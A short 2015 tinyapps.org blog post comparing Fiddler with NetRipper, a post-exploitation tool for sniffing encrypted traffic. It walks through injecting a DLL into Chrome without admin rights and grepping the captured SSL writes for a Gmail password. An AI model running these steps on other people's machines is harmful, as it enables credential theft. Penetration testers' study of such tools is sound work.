tinyapps.org / blog


Sniffing encrypted traffic #

Fiddler Screenshot ("The free web debugging proxy for any browser, system or platform") has long been used for sniffing encrypted web traffic, but it requires full administrator access to install an untrusted root certificate for decryption to work (Tools > Fiddler Options... > HTTPS > etc) and the .NET Framework to run.

NetRipper ("Smart traffic sniffing for penetration testers") requires neither. It is "a post exploitation tool targeting Windows systems which uses API hooking in order to intercept network traffic and encryption related functions from a low privileged user, being able to capture both plain-text traffic and encrypted traffic before encryption/after decryption." Further, "NetRipper should be able to capture network traffic from: Putty, WinSCP, SQL Server Management Studio, Lync (Skype for Business), Microsoft Outlook, Google Chrome, Mozilla Firefox. The list is not limited to these applications but other tools may require special support."

Here's a simple example of it in action:
  1. Launch Google Chrome
  2. Open cmd.exe (no need for elevated command prompt), cd to the NetRipper directory and run:
    C:\Release>NetRipper.exe DLL.dll chrome.exe
    Trying to inject DLL.dll in chrome.exe
    Reflective injected in: 2880
    Reflective injected in: 2992
    Reflective injected in: 3096
  3. Login to GMail account in Chrome
  4. NetRipper saves data to %temp%\NetRipper by default (on most systems, this will be C:\Users\username\AppData\Local\Temp\NetRipper):
    C:\Release>dir %temp%\NetRipper /B
    2880_chrome.exe_recv.txt
    2880_chrome.exe_SSL_Read.txt
    2880_chrome.exe_SSL_Write.txt
    2880_chrome.exe_StringFinder.txt
    2880_chrome.exe_WSASend.txt
    NetRipperLog.txt
  5. Search for the string "Passwd":
    C:\Release>findstr Passwd %temp%\NetRipper\2880_chrome.exe_SSL_Write.txt
    ...Email=tinyapps%40gmail.com&Passwd=PASSWORD_IN_PLAIN_TEXT_SHOWN_HERE&PersistentCookie=yes&signIn=...
Fiddler: NetRipper:

/windows | Aug 15, 2015


Subscribe or visit the archives